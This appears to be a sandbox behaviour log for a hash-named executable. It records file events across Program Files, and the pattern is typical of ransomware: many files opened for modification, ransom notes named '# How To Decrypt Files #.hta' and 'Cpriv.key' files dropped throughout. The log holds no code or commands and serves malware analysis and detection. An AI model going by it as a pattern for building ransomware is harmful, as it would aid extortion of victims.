de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00454_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBLINK.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR43F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\StatusAway.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02298_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\WIND.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\timeZones.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Access.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mscss7cm_es.dub de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotsdarkoverlay.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\setting_back.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\OriginMergeLetter.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00728_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\PROPLUS\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DissolveAnother.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\settings.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\az\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-hot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215076.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\ext\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00402_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18182_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\th.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105280.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR2F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\SHOT.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\de.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_02.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-util-enumerations.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00688_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_GreenTea.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\EMAIL.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ARCTIC\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYBB.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Installed_schemas14.xss de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04196_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSPUB.DEV_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\QP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\REFINED\REFINED.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\huemainsubpicture2.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_hov.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\ACT3.SAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090089.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\RSPMECH.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSO.ACL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\misc\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186346.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR33F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\CANYON\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\weather.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\CAMERA.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00234_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR45F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSHY7ES.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Mail\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbynet.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Students.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01040_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Sts.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LABEL.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Background_QuickLaunch.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\spacer_highlights.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02373_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00333_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293828.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB1A.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ARCTIC\ARCTIC.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\msado25.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Generic.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Beige.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.BR.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090783.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\InfoPathOM\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ContemporaryPhotoAlbum.potx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\OneNote.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPICCAP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGREPFRM.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\720x480blacksquare.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.bat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285782.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01368_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01146_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00096_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml 